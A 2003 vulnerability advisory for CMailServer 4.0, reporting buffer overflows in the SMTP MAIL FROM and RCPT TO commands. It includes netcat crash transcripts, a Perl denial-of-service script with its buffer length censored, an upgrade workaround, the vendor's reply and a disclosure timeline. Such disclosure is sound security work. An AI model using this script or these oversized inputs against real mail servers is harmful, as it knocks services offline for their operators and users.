Multiple Buffer Overflow Vulnerabilities
                          Found in CMailServer 4.0
                         http://www.youngzsoft.com
                         
                          Discovered by Dennis Rand
                             www.Infowarfare.dk
------------------------------------------------------------------------


-----[SUMMARY
CMailServer, a small and easy to administer email server software and web 
mail server software, can help you build your own email server for 
Win NT/2000/XP. It enables you to send and receive email across the 
Internet or within your LAN. The ESMTP authentication, ASP form web 
mail and multiple domain names are supported. 

CMailServer offers an unlimited email users license at a reasonable 
and affordable price compared to other email server software. 
For those small to medium sized companies, CMailServer will be an 
economic and effective solution to handle their e-mail management 
requirements. CMailServer also is a web mail server software and 
provides full web mail service. The web mail is based on ASP. 
You can customize your web mail interface freely. Give it a try 
and find out how easy it is to build an email server and web mail 
server for your own business.


The problem is a Buffer Overflow in the SMTP protocol, within the 
ESMTP CMailServer 4.0.2002.11.24 SMTP Service, causing the service to
shutdown.
It is possible to actually overwrite the exception handler on the stack
allowing 
A system compromise with code execution running as SYSTEM.


-----[AFFECTED SYSTEMS
Vulnerable systems:
 * ESMTP CMailServer 4.0.2003.03.27 SMTP Service

Immune systems:
 * ESMTP CMailServer 4.0.2003.03.30 SMTP Service

-----[SEVERITY
High -         An attacker is able to cause a DoS attack on the SMTP
protocol.
              And we can actually overwrite the exception handler on the
stack 
              Allowing a system compromise with code execution running as
SYSTEM.
              

-----[DESCRIPTION OF WHAT THE VULNERABILITY IS
The Vulnerability is a Buffer Overflow in the ESMTP CMailServer
4.0.2002.11.24 SMTP Service
When a malicious attacker sends a large amount into the "MAIL FROM" and the
"RCPT TO"
The buffer will overflow. If the code was carefully crafted, attackers could
execute 
Arbitrary command in system privilege.

The following transcript demonstrates a sample exploitation of the 
Vulnerabilities:
----------------------------- [Transcript] -----------------------------
nc warlab.dk 25
220 ESMTP CMailServer 4.0.2003.03.27 SMTP Service Ready
HELO Foobar
250 win2k-serv
Mail From : <aaaaa....[Buffer size 2000 Bytes @warlab.dk]
<Connection closed>

The same Vulnerability is in the RCPT TO
nc warlab.dk 25
220 ESMTP CMailServer 4.0.2003.03.27 SMTP Service Ready
HELO Foobar
250 win2k-serv
Mail From : admin@warlab.dk
250 <admin@warlab.dk> Sender Ok
Rcpt To: <aaaaa....[Buffer size 2000 Bytes @warlab.dk]
<connection closed>
----------------------------- [Transcript] -----------------------------

----------------------------- [Exploit Code] -----------------------------
#!/usr/bin/perl -w
##################
# ESMTP CMailServer 4.0.2003.03.27 SMTP Service DoS attack
#
# URL: http://www.infowarfare.dk/
# EMAIL: der@infowarfare.dk
# USAGE: sploit.pl <target ip>
#
# Summary:
#
# The problem is a Buffer Overflow in the SMTP protocol, within the 
# ESMTP CMailServer, causing the service to shutdown
# It is then where we can actually overwrite the exception handler on the
stack allowing 
# A system compromise with code execution running as SYSTEM.
# 
#
# Ive censored some of the source code out. =)
#
# Solution: 
# None at this time
# 
#

use IO::Socket;
    
$target = shift() || "warlab.dk";
my $port = 25;
my $Buffer = "A" x <CENSORED> ; # 


my $sock = IO::Socket::INET->new (
                                    PeerAddr => $target,
                                    PeerPort => $port,
                                    Proto => 'tcp'
                                 ) || die "could not connect: $!";

my $banner = <$sock>;
if ($banner !~ /^2.*/)
{
    print STDERR "Error: invalid server response '$banner'.\n";
    exit(1);
}

print $sock "HELO $target\r\n";
$resp = <$sock>;

print $sock "MAIL FROM: $Buffer\@$target.dk\r\n";
$resp = <$sock>;

print $sock "\r\n";
print $sock "\r\n\r\n\r\n\r\n\r\n\r\n";

close($sock);
----------------------------- [Exploit Code] -----------------------------



-----[DETECTION
ESMTP CMailServer 4.0.2003.03.27 SMTP Service is vulnerable to the
above-described attacks. 
Earlier versions may be susceptible as well. To determine if a specific 
implementation is vulnerable, experiment by following the above transcript. 


-----[WORK AROUNDS
Upgrade as soon as possible to version -> ESMTP CMailServer 4.0.2003.03.30
SMTP Service
or later. 
The other workaround is to disable the SMTP service but that is not fun.

-----[VENDOR RESPONSE
Quoting YoungZSoft <yaoer@youngzsoft.com>:
I thank you very very much for your report.
We will fix this as soon as possible
Yaoer

-----[DISCLOSURE TIMELINE
24/04/2003 Found the Vulnerability, and made an analysis.
29/04/2003 Contacted Vendor at support@youngzsoft.net 
30/04/2003 Received response from vendor with a fix to test
01/05/2003 New version tested negative for the vulnerabilities
10/05/2003 Public Disclosure.


-----[ADDITIONAL INFORMATION
The vulnerability was discovered and reported by <der@infowarfare.dk> Dennis
Rand

-----[DISCLAIMER
The information in this bulletin is provided "AS IS" without warranty of any
kind. 
In no event shall we be liable for any damages whatsoever including direct,
indirect, 
incidental, consequential, loss of business profits or special damages.